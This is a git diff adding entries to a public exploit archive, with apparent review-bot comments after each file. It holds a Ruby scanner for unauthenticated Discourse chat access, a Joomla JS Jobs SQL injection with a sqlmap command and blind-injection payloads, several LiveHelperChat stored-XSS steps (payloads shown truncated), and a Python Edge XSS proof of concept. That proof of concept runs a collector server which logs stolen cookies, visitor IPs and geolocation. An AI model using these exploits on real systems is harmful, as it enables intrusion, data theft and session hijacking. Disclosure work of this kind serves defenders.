"\n#{index + 1}. #{result[:vulnerability]}" + puts " Severity: #{result[:severity]}" + puts " Description: #{result[:description]}" + puts " Impact: #{result[:impact]}" + + if result[:messages_count] + puts " Messages Found: #{result[:messages_count]}" + end + if result[:channels] + puts " Channels: #{result[:channels].join(', ')}" + end + if result[:endpoint] + puts " Endpoint: #{result[:endpoint]}" + end + end + + puts "\n[!] REMEDIATION:" + puts "1. Update Discourse to version 3.1.1 stable or 3.2.0.beta2 or later" + puts "2. Implement proper authentication for MessageBus endpoints" + puts "3. Review and restrict access to chat-related APIs" + puts "4. Monitor MessageBus access logs for suspicious activity" + puts "5. 
Consider disabling chat features if not required" + end + + puts "\n" + "="*60 + end +end + +# Run the exploit if called directly +if __FILE__ == $0 + if ARGV.length != 1 + puts "Usage: ruby #{$0} " + puts "Example: ruby #{$0} https://discourse.example.com" + exit 1 + end + + target_url = ARGV[0] + exploit = CVE202345131.new(target_url) + exploit.run_exploit +end \ No newline at end of file diff --git a/exploits/php/webapps/52373.txt b/exploits/php/webapps/52373.txt new file mode 100644 index 000000000..882e6e92c --- /dev/null +++ b/exploits/php/webapps/52373.txt 
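Review bot: extract_client_id falls back to `SecureRandom.hex(16)` but the file never does `require 'securerandom'`; unless one of the other requires loads it transitively, that fallback raises NameError, which the surrounding `rescue => e` then reports as a generic MessageBus error. The detection logic overstates its evidence: test_messagebus_access records a High "MessageBus Access" finding whenever `/message-bus/poll` returns 200 with a non-empty JSON array, and test_message_history_access records a Medium finding whenever an HTML body merely contains the substrings 'chat' and 'message', so the report and its remediation section will claim findings on patched instances. make_request has no `else` arm in `case method.upcase`, so any method other than GET or POST leaves `request` nil and fails with NoMethodError inside the rescue. `http.verify_mode = OpenSSL::SSL::VERIFY_NONE` disables certificate validation for every HTTPS target, and `require 'base64'` and `@csrf_token` are unused.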
@@ -0,0 +1,65 @@
+# Exploit Title: Joomla JS Jobs plugin 1.4.2 - SQL injection
+# Google Dork: n/a
+# Date: 07/07/2025
+# Exploit Author: Adam Wallwork
+# Vendor Homepage: https://joomsky.com/
+# Demo: https://demo.joomsky.com/js-jobs/jm/free/
+# Software Link: https://extensions.joomla.org/extension/js-jobs/
+# Version: v1.4.2
+# Tested on: v1.4.2
+
+
+An SQL injection vulnerability exists in the JS Jobs extension (v1.4.2) via the 'cvid' parameter and is exploitable as the jobseeker user.
+
+To exploit this vulnerability login as the jobseeker user with default credentials (jobseeker:demo) and go to 'jobseeker-controlpanel >> My Stuff >> Newest Jobs >> Newest Jobs >> Apply Now >> Apply Now' and capture the "Apply Now" request (req.txt).
+
+HTTP Request:
+```
+POST /index.php?option=com_jsjobs&task=jobapply.jobapplyajax HTTP/2
+Host: localhost:8080
+Cookie: joomla_user_state=logged_in; 67aa5f9b49e233456b916ea62ef1447b=kjou43pssdvaa5plr84dhc8P64
+Content-Length: 38
+Sec-Ch-Ua-Platform: "Linux"
+Accept-Language: en-GB,en;q=0.9
+Sec-Ch-Ua: "Chromium";v="137", "Not/A)Brand";v="24"
+Sec-Ch-Ua-Mobile: ?0
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
+Accept: */*
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://localhost:8080
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost:8080/index.php/component/jsjobs/newest-jobs?Itemid=
+Accept-Encoding: gzip, deflate, br
+Priority: u=1, i
+
+jobid=1&cvid=1&coverletterid=4&uid=460
+```
+
+Exploit:
+```
+sqlmap -r req.txt --dbs --batch -p cvid --dbms=mysql --threads=10
+        ___
+       __H__
+ ___ ___[']_____ ___ ___  {1.9.1.2#dev}
+|_ -| . [']     | .'| . |
+|___|_  [']_|_|_|__,|  _|
+      |_|V...       |_|   https://sqlmap.org
+
+---
+Parameter: cvid (POST)
+Type: boolean-based blind
+Title: Boolean-based blind - Parameter replace (original value)
+Payload: jobid=1&cvid=(SELECT (CASE WHEN (7270=7270) THEN 1 ELSE (SELECT 6098 UNION SELECT 7386) END))&coverletterid=4&uid=460
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: jobid=1&cvid=1 AND (SELECT 6497 FROM (SELECT(SLEEP(5)))EAyv)&coverletterid=4&uid=460
+---
+
+available databases [2]:
+[*] joomla_db
+[*] information_schema
+```
\ No newline at end of file
diff --git a/exploits/php/webapps/52376.txt b/exploits/php/webapps/52376.txt
new file mode 100644
index 000000000..26e3ba185
--- /dev/null
+++ b/exploits/php/webapps/52376.txt
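Review bot: The header has no `# Patched Version:` line and no vendor fix reference, so a reader cannot tell whether any JS Jobs release after 1.4.2 closes the `cvid` injection in `task=jobapply.jobapplyajax`; add one (or state explicitly that no fix was available at publication), and extend `# Tested on: v1.4.2` with the Joomla core and MySQL versions, since the line currently repeats the plugin version only. The captured request also publishes a complete session cookie value in the `Cookie:` header; it adds nothing to the reproduction and should be replaced with a placeholder such as `Cookie: joomla_user_state=logged_in; <session_name>=<session_id>`. The sqlmap output confirms only blind techniques, so it is worth noting that `jobid`, `coverletterid` and `uid` in the same body were (or were not) tested, as the text only asserts `cvid`.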
@@ -0,0 +1,32 @@
+# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS)
+via Telegram Bot Username
+# Date: 09/06/2025
+# Exploit Author: Manojkumar J (TheWhiteEvil)
+# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
+# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
+# Software Link:
+https://github.com/LiveHelperChat/livehelperchat/
+# Version: <=4.61
+# Patched Version: 4.61
+# Category: Web Application
+# Tested on: Mac OS Sequoia 15.5, Firefox
+# CVE : CVE-2025-51396
+# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51396
+
+A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
+version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
+injecting a crafted payload into the Telegram Bot Username parameter. This
+payload is stored and later executed when an admin or higher-privileged
+user views or edits the Telegram Bot Username.
+
+
+## Reproduction Steps:
+
+1. Log in as an operator user in Live Helper Chat.
+2. Navigate to `Settings > Live Help Configuration > Telegram Bot`.
+3. In the **Bot Username** field, enter the following payload:
+```
+ ">
+```
+4. Save the settings.
+5. Revisit the Telegram configuration panel and — the payload will execute.
\ No newline at end of file
diff --git a/exploits/php/webapps/52377.txt b/exploits/php/webapps/52377.txt
new file mode 100644
index 000000000..a908e93c3
--- /dev/null
+++ b/exploits/php/webapps/52377.txt
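Review bot: `# Version: <=4.61` and `# Patched Version: 4.61` contradict each other — a release cannot be both affected and the fix; if 4.61 is the first fixed release the header should read `# Version: < 4.61`, otherwise the patched line must name the later release. The payload in step 3 is rendered here as a bare `">`, which only closes the attribute; the element that follows is not shown, so the steps are not reproducible from this text as published. Step 1 says an operator performs the injection, but step 2 requires access to `Settings > Live Help Configuration`; stating which operator permission grants that access would make the privilege boundary (operator to admin) verifiable.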
@@ -0,0 +1,33 @@
+# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname
+# Date: 09/06/2025
+# Exploit Author: Manojkumar J (TheWhiteEvil)
+# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
+# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
+# Software Link:
+https://github.com/LiveHelperChat/livehelperchat/
+# Version: <=4.61
+# Patched Version: 4.61
+# Category: Web Application
+# Tested on: Mac OS Sequoia 15.5, Firefox
+# CVE : CVE-2025-51397
+# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51397
+
+A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
+version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
+injecting a crafted payload into the Operator Surname field. This payload
+is stored and later executed when an admin or higher-privileged user views
+the Recipients List where the attacker is listed as the Owner.
+
+## Reproduction Steps:
+
+1. Log in as an operator.
+2. Navigate to your Operator Surname field.
+3. Create new Operator Surname or Modify the Operator Surname, enter the
+following payload:
+ ```
+ ">
+ ```
+4. Save the changes.
+5. This payload is stored and later executed when an admin or
+higher-privileged user views the Recipients List where the attacker is
+listed as the Owner.
\ No newline at end of file
diff --git a/exploits/php/webapps/52378.txt b/exploits/php/webapps/52378.txt
new file mode 100644
index 000000000..cc62d7840
--- /dev/null
+++ b/exploits/php/webapps/52378.txt
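Review bot: The header lists `# Version: <=4.61` next to `# Patched Version: 4.61`, which cannot both hold; either the affected range is `< 4.61` or the fix landed in a later release, and the header should say which. Step 2, "Navigate to your Operator Surname field", names no page, unlike the sibling advisory in this patch that gives a menu path; something like `2. Open your operator profile (the page where Name and Surname are edited).` would make it reproducible. The payload in step 3 is shown only as `">`, so the element that actually executes is missing as rendered.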
@@ -0,0 +1,35 @@
+# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS)
+via Facebook Integration Page Name Field
+# Date: 09/06/2025
+# Exploit Author: Manojkumar J (TheWhiteEvil)
+# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
+# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
+# Software Link:
+https://github.com/LiveHelperChat/livehelperchat/
+# Version: <=4.61
+# Patched Version: 4.61
+# Category: Web Application
+# Tested on: Mac OS Sequoia 15.5, Firefox
+# CVE : CVE-2025-51398
+# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51398
+
+A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
+version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
+injecting a crafted payload into the Facebook page integration Name Field.
+The payload is stored and executed when higher-privileged users (e.g.,
+administrators) access or edit the integration settings, resulting in
+stored Cross Site Scripting (XSS).
+
+## Reproduction Steps:
+
+1. Log in as an operator.
+2. Navigate to your Facebook page integration.
+3. Create new Facebook page integration, enter the following payload in the
+Facebook page integration Name Field:
+ ```
+ ">
+ ```
+4. Save the changes.
+5. The payload is stored and executed when higher-privileged users (e.g.,
+operator or administrators) access or edit the Facebook page integration,
+resulting in stored Cross Site Scripting (XSS).
\ No newline at end of file
diff --git a/exploits/php/webapps/52379.txt b/exploits/php/webapps/52379.txt
new file mode 100644
index 000000000..1f7147e60
--- /dev/null
+++ b/exploits/php/webapps/52379.txt
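Review bot: Step 5 counts "operator" among the "higher-privileged users" that trigger the payload, while the description above says the injector is an operator and the victim is an administrator; if any operator who opens the integration is affected, say so plainly (`5. The payload executes for any user, operator or administrator, who opens or edits that Facebook page integration.`), because that changes whether this is a privilege-boundary crossing or an operator-to-operator issue. `# Version: <=4.61` together with `# Patched Version: 4.61` is self-contradictory and one of the two lines needs correcting. The step-3 payload is rendered as a bare `">`, so the executing element is not visible as published.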
@@ -0,0 +1,32 @@
+# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS)
+via Personal Canned Messages
+# Date: 09/06/2025
+# Exploit Author: Manojkumar J (TheWhiteEvil)
+# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
+# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
+# Software Link:
+https://github.com/LiveHelperChat/livehelperchat/
+# Version: <=4.61
+# Patched Version: 4.61
+# Category: Web Application
+# Tested on: Mac OS Sequoia 15.5, Firefox
+# CVE : CVE-2025-51400
+# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51400
+
+A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
+version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
+injecting a crafted payload into the Personal Canned Messages. When an
+admin or operator user views the message, and tries to send canned messages
+the stored javascript executes in their browser context.
+
+## Reproduction Steps:
+
+1. Log in as an operator.
+2. Navigate to your Personal Canned Messages.
+3. Create new personal canned message, enter the following payload:
+ ```
+ ">
+ ```
+4. Save the changes.
+5. Try to use the personal canned message, the cross site scripting (xss)
+will execute.
\ No newline at end of file
diff --git a/exploits/php/webapps/52380.txt b/exploits/php/webapps/52380.txt
new file mode 100644
index 000000000..0f5272714
--- /dev/null
+++ b/exploits/php/webapps/52380.txt
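Review bot: Step 5 has the same operator who created the personal canned message use it, which as written is self-XSS; the description claims "an admin or operator user" is affected, so the steps need to show how a different account reaches a message that is labelled personal (for example an administrator editing that operator's canned messages), otherwise the impact is not demonstrated. `# Version: <=4.61` and `# Patched Version: 4.61` contradict each other and one line must change. The payload in step 3 appears here only as `">`, so the element that executes is missing as rendered.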
@@ -0,0 +1,30 @@
+# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function
+# Date: 09/06/2025
+# Exploit Author: Manojkumar J (TheWhiteEvil)
+# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
+# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
+# Software Link:
+https://github.com/LiveHelperChat/livehelperchat/
+# Version: <=4.61
+# Patched Version: 4.61
+# Category: Web Application
+# Tested on: Mac OS Sequoia 15.5, Firefox
+# CVE : CVE-2025-51401
+# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51401
+
+A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
+version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
+injecting a crafted payload into the Operator Chat Name Field Triggers on
+Chat Owner Transfer Functionality on Live Helper Chat.
+
+## Reproduction Steps:
+1. Log in as an operator.
+2. Navigate to your operator settings page.
+3. In the **Name** field, enter the following payload:
+ ```
+ ">
+ ```
+4. Save the changes.
+5. Initiate a chat with a visitor.
+6. Transfer the chat to another operator — the XSS payload executes in the
+receiving operator’s chat interface.
\ No newline at end of file
diff --git a/exploits/php/webapps/52381.txt b/exploits/php/webapps/52381.txt
new file mode 100644
index 000000000..9d8ffb8b6
--- /dev/null
+++ b/exploits/php/webapps/52381.txt
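Review bot: The description sentence "injecting a crafted payload into the Operator Chat Name Field Triggers on Chat Owner Transfer Functionality" is not a sentence and hides the actual sink; split it, e.g. `The operator Name field is stored unescaped. When a chat owned by that operator is transferred, the name is rendered in the receiving operator's chat interface and the script executes.` Step 6 should also say whether the receiving operator must accept the transfer or merely see the pending one, since that decides how much interaction the victim needs. As in the sibling advisories, `# Version: <=4.61` and `# Patched Version: 4.61` cannot both be right, and the step-3 payload is shown only as `">`.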
@@ -0,0 +1,34 @@
+# Exploit Title: LiveHelperChat <=4.61 - Stored Cross Site Scripting (XSS)
+via Department Assignment Alias Nick Field
+# Date: 09/06/2025
+# Exploit Author: Manojkumar J (TheWhiteEvil)
+# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
+# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
+# Software Link:
+https://github.com/LiveHelperChat/livehelperchat/
+# Version: <=4.61
+# Patched Version: 4.61
+# Category: Web Application
+# Tested on: Mac OS Sequoia 15.5, Firefox
+# CVE : CVE-2025-51403
+# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51403
+# Reference:
+https://github.com/LiveHelperChat/livehelperchat/pull/2228/commits/2056503ad96e04467ec9af8d827109b9b9b46223
+
+A low-privileged user/operator injects a malicious JavaScript payload into
+the Department Assignment "Alias Nick" field while assigning or editing
+department access. When a higher-privileged user (e.g., admin or operator)
+edits the department assignment "Alias Nick" field, the stored script is
+executed in their browser context.
+
+## Reproduction Steps:
+
+1. Log in as an operator.
+2. Navigate to your Department Assignment settings page.
+3. In the "Alias Nick" field, enter the following payload:
+ ```
+ ">
+ ```
+4. Save the changes.
+5. Revist the Department Assignment settings page and edit the Alias Nick
+field, the cross site scripting (xss) will execute.
\ No newline at end of file
diff --git a/exploits/windows/remote/52372.txt b/exploits/windows/remote/52372.txt
new file mode 100644
index 000000000..3abdbb165
--- /dev/null
+++ b/exploits/windows/remote/52372.txt
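Review bot: This is the one advisory in the set that cites the fixing commit (PR #2228), yet its header still carries the contradictory pair `# Version: <=4.61` / `# Patched Version: 4.61`; the release that contains that commit should be named as the patched version and the affected range written as `< <that release>`. Step 5 has the same operator who saved the payload trigger it by re-editing the field, which is self-XSS; the description claims an admin editing the assignment is affected, so the steps should have a second, higher-privileged account perform step 5. Minor: "Revist" in step 5 should be "Revisit", and the step-3 payload is rendered as a bare `">` with no executing element.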
@@ -0,0 +1,235 @@ +# Titles: Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS) +# Author: nu11secur1ty +# Date: 2025-07-18 +# Vendor: Microsoft +# Software: Microsoft Edge Browser +# Reference: https://www.cve.org/CVERecord?id=CVE-2015-6176 + +#!/usr/bin/python +# nu11secur1ty CVE-2015-6176 + +import http.server +import socketserver +import socket +import threading +from urllib import parse +import requests +import datetime + +PORT = 8080 +COLLECTOR_PORT = 9000 + +# HTML page with extended XSS exploit that sends lots of info via Image GET +to collector +HTML_CONTENT = b\\\"\\\"\\\" + + + +XSS Edge Bypass PoC + + + +

XSS Edge Bypass PoC

+

If this alert appears, XSS is executed.

+ + +\\\"\\\"\\\" + +# Collector page with large sea picture and centered message (Unicode +allowed) +COLLECTOR_PAGE = \\\"\\\"\\\" + + + +Collected + + + +
Thank you for visiting the collector page
+ + +\\\"\\\"\\\" + +class ExploitHandler(http.server.SimpleHTTPRequestHandler): + def do_GET(self): + if self.path in (\\\'/\\\', \\\'/index.html\\\'): + content = HTML_CONTENT.replace(b\\\"{LOCAL_IP}\\\", +local_ip.encode()).replace(b\\\"{COLLECTOR_PORT}\\\", +str(COLLECTOR_PORT).encode()) + self.send_response(200) + self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\") + self.send_header(\\\"Content-Length\\\", str(len(content))) + self.end_headers() + self.wfile.write(content) + else: + self.send_error(404) + +class CollectorHandler(http.server.BaseHTTPRequestHandler): + def do_GET(self): + parsed_path = parse.urlparse(self.path) + if parsed_path.path == \\\"/collect\\\": + query = parse.parse_qs(parsed_path.query) + + cookie = query.get(\\\"cookie\\\", [\\\"\\\"])[0] + url = query.get(\\\"url\\\", [\\\"\\\"])[0] + referrer = query.get(\\\"referrer\\\", [\\\"\\\"])[0] + language = query.get(\\\"language\\\", [\\\"\\\"])[0] + platform = query.get(\\\"platform\\\", [\\\"\\\"])[0] + timezone = query.get(\\\"timezone\\\", [\\\"\\\"])[0] + screen = query.get(\\\"screen\\\", [\\\"\\\"])[0] + + ip = self.client_address[0] + user_agent = self.headers.get(\\\"User-Agent\\\", \\\"Unknown\\\") + timestamp = datetime.datetime.now().strftime(\\\"%Y-%m-%d +%H:%M:%S\\\") + + location = self.get_location(ip) + + if cookie: + print(f\\\"[{timestamp}] [+] Collected cookie: {cookie}\\\") + print(f\\\" URL: {url}\\\") + print(f\\\" Referrer: {referrer}\\\") + print(f\\\" Language: {language}\\\") + print(f\\\" Platform: {platform}\\\") + print(f\\\" Timezone: {timezone}\\\") + print(f\\\" Screen Resolution: {screen}\\\") + print(f\\\" From IP: {ip}\\\") + print(f\\\" User-Agent: {user_agent}\\\") + print(f\\\" Location: {location}\\\") + print(\\\"-\\\" * 50) + + # Save collected info to a file + with open(\\\"collected_data.log\\\", \\\"a\\\", encoding=\\\"utf-8\\\") as f: + f.write(f\\\"[{timestamp}] Cookie: {cookie}\\\\n\\\") + f.write(f\\\" URL: 
{url}\\\\n\\\") + f.write(f\\\" Referrer: {referrer}\\\\n\\\") + f.write(f\\\" Language: {language}\\\\n\\\") + f.write(f\\\" Platform: {platform}\\\\n\\\") + f.write(f\\\" Timezone: {timezone}\\\\n\\\") + f.write(f\\\" Screen Resolution: {screen}\\\\n\\\") + f.write(f\\\" IP: {ip}\\\\n\\\") + f.write(f\\\" User-Agent: {user_agent}\\\\n\\\") + f.write(f\\\" Location: {location}\\\\n\\\") + f.write(\\\"-\\\" * 50 + \\\"\\\\n\\\") + + self.send_response(200) + self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\") + content = COLLECTOR_PAGE.encode(\\\'utf-8\\\') + self.send_header(\\\"Content-Length\\\", str(len(content))) + self.end_headers() + self.wfile.write(content) + else: + self.send_error(404) + + def get_location(self, ip): + # Use free IP info service; fallback gracefully if no internet + try: + resp = requests.get(f\\\"https://ipinfo.io/{ip}/json\\\", timeout=3) + if resp.status_code == 200: + data = resp.json() + city = data.get(\\\"city\\\", \\\"\\\") + region = data.get(\\\"region\\\", \\\"\\\") + country = data.get(\\\"country\\\", \\\"\\\") + loc = data.get(\\\"loc\\\", \\\"\\\") + return f\\\"{city}, {region}, {country} (coords: {loc})\\\" + except Exception: + pass + return \\\"Location lookup failed or unavailable\\\" + +def get_local_ip(): + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + try: + s.connect((\\\"8.8.8.8\\\", 80)) + ip = s.getsockname()[0] + except Exception: + ip = \\\"127.0.0.1\\\" + finally: + s.close() + return ip + +def run_exploit_server(): + with socketserver.TCPServer((\\\"\\\", PORT), ExploitHandler) as httpd: + print(f\\\"[*] Exploit server running at: http:// +{local_ip}:{PORT}/index.html\\\") + httpd.serve_forever() + +def run_collector_server(): + with socketserver.TCPServer((\\\"\\\", COLLECTOR_PORT), CollectorHandler) as +httpd: + print(f\\\"[*] Collector server listening for stolen cookies at: +http://{local_ip}:{COLLECTOR_PORT}/collect\\\") + httpd.serve_forever() + +if __name__ == 
\\\"__main__\\\": + local_ip = get_local_ip() + try: + print(f\\\"[*] Your server IP is: {local_ip}\\\") + exploit_thread = threading.Thread(target=run_exploit_server, +daemon=True) + exploit_thread.start() + + run_collector_server() + except KeyboardInterrupt: + print(\\\"\\\\n[!] Shutting down servers. Goodbye!\\\") + +``` + +# Video: +[href](https://www.youtube.com/watch?v=T2YLrFsvXOc) + +# Source: +[href]( +https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176) + +# Buy me a coffee if you are not ashamed: +[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index eb3013844..7dbed2657 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
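Review bot: `CollectorHandler.do_GET` prints and logs a hit only inside `if cookie:`, so a visitor whose `document.cookie` is empty (HttpOnly-only cookies, or a page that sets none) is dropped entirely even though `url`, `referrer`, `platform`, the User-Agent and the client IP were delivered; log unconditionally and mark the cookie as absent, e.g. `cookie = query.get("cookie", [""])[0] or "<none>"`. `get_location()` forwards every visitor IP to `ipinfo.io`, a third-party disclosure of the target's address that a PoC should make opt-in rather than perform by default. As rendered here the page body has lost its script element, but both the page and whatever it executes are served by `ExploitHandler` from the same origin, so what is exercised is an attacker-authored page rather than a reflected injection on a target site; what ties this to the CVE-2015-6176 filter bypass is not visible in these lines and should be stated in the header. The shebang `#!/usr/bin/python` may resolve to Python 2 while the code relies on f-strings and `http.server`; use `#!/usr/bin/env python3`.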
@@ -11618,6 +11618,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25205,exploits/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",remote,multiple,,2005-03-10,2013-05-13,1,,,,,,https://www.securityfocus.com/bid/12772/info
 42753,exploits/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor Access",2017-05-19,"Simon Brannstrom",remote,multiple,,2017-09-19,2017-09-20,0,CVE-2017-12930;CVE-2017-12929,,,,,
 51019,exploits/multiple/remote/51019.txt,"Teleport v10.1.1 - Remote Code Execution (RCE)",2022-09-23,"Brandon Roach",remote,multiple,,2022-09-23,2022-09-23,0,CVE-2022-36633,,,,,
+52374,exploits/multiple/remote/52374.c,"Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow",2025-07-22,"Byte Reaper",remote,multiple,,2025-07-22,2025-07-22,0,CVE-2025-7795,,,,,
 33499,exploits/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,remote,multiple,,2010-01-11,2014-05-26,1,CVE-2009-4491;OSVDB-61775,,,,,https://www.securityfocus.com/bid/37714/info
 21276,exploits/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Full Path Disclosure",2002-02-06,phinegeek,remote,multiple,,2002-02-06,2012-09-12,1,CVE-2002-0266;OSVDB-4313,,,,,https://www.securityfocus.com/bid/4035/info
 24224,exploits/multiple/remote/24224.c,"TildeSlash Monit 1-4 - Authentication Handling Buffer Overflow",2004-06-04,"Nilanjan De",remote,multiple,,2004-06-04,2013-01-19,1,,,,,,https://www.securityfocus.com/bid/10581/info
@@ -11928,6 +11929,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31686,exploits/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,webapps,multiple,80,2014-02-16,2014-02-16,1,OSVDB-103387,,,,,
 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,,2018-07-11,2018-07-13,1,,Traversal,,http://www.exploit-db.com/screenshots/idlt45500/45007.png,,
 33759,exploits/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,webapps,multiple,,2010-03-14,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38721/info
+52375,exploits/multiple/webapps/52375.rb,"Discourse 3.1.1 - Unauthenticated Chat Message Access",2025-07-22,İbrahimsql,webapps,multiple,,2025-07-22,2025-07-22,0,CVE-2023-45131,,,,,
 52358,exploits/multiple/webapps/52358.py,"Discourse 3.2.x - Anonymous Cache Poisoning",2025-07-08,İbrahimsql,webapps,multiple,,2025-07-08,2025-07-08,0,CVE-2024-47773,,,,,
 49752,exploits/multiple/webapps/49752.html,"DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)",2021-04-08,"Issac Briones",webapps,multiple,,2021-04-08,2021-04-08,0,CVE-2021-30147,,,,,
 48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,,2020-07-22,2020-07-22,0,CVE-2020-7680,,,,,
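Review bot: The new index row describes 52375 as "Discourse 3.1.1 - Unauthenticated Chat Message Access", naming 3.1.1 as the affected version, while the script's own remediation text in this same patch tells users to "Update Discourse to version 3.1.1 stable or 3.2.0.beta2 or later"; one of the two is wrong, and readers who only see the index will take 3.1.1 as vulnerable. The description should carry the affected range the advisory actually claims (presumably the releases before 3.1.1 stable), e.g. `"Discourse < 3.1.1 - Unauthenticated Chat Message Access"`, or the script's remediation line should be corrected — whichever matches CVE-2023-45131.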
@@ -12324,6 +12326,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,,2021-04-01,2021-04-01,0,,,,,,
 49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple,,2020-12-04,2020-12-04,0,,,,,,
 46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,,2019-05-28,2019-05-28,0,,,,,,
+52370,exploits/multiple/webapps/52370.py,"Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE",2025-07-22,"Md Amanat Ullah (xSwads)",webapps,multiple,,2025-07-22,2025-07-22,0,CVE-2025-34077,,,,,
 52194,exploits/multiple/webapps/52194.py,"Pimcore 11.4.2 - Stored cross site scripting",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11954,,,,,
 35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,,
 52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,,
@@ -12402,6 +12405,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
 48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
 52199,exploits/multiple/webapps/52199.txt,"SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)",2025-04-14,"James Nicoll",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-47605,,,,,
+52371,exploits/multiple/webapps/52371.py,"Simple File List WordPress Plugin 4.2.2 - File Upload to RCE",2025-07-22,"Md Amanat Ullah (xSwads)",webapps,multiple,,2025-07-22,2025-07-22,0,CVE-2020-36847,,,,,
 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
 51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
